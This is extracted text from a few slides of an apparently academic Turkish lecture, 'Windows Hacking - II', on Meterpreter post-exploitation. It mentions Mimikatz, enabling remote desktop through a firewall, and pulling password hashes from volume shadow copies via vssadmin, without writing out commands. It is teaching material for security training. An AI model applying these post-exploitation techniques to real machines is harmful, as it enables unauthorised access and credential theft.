    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Meterpreter Post Mod¨ulleri VI Uzak masa¨ust¨u servisini ba¸slatır. G¨uvenlik duvarında uzak masa¨ust¨u servisinin kullandı˘gı portu a¸car (Gerekli oldu˘gu durumlarda). Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 46.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Vssadmin komutu I Vssadmin G¨olge Kopyalardan S¸ifre ¨Ozeti Alma Dosyaların eski versiyonlarına geri d¨on¨u¸s yapabilmeyi sa˘glayan Windows i¸sletim sisteminin bir ¨ozelli˘gi Vssadmin 5 Current volume shadow copy backups All installed shadow copy writers and providers. Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II
  • 47.
    Ke¸sif (Devam) Exploitation Post-Exploit Giri¸s Meterpreter Core komutları StdapiKomutları Priv ve Incognito Eklentileri Mimikatz Eklentisi Meterpreter Post Mod¨ulleri Vssadmin Vssadmin komutu II 5 https://technet.microsoft.com/en-us/library/cc754968(v=ws.11).aspx Dr. Ferhat ¨Ozg¨ur C¸atak ozgur.catak@tubitak.gov.tr Windows Hacking - II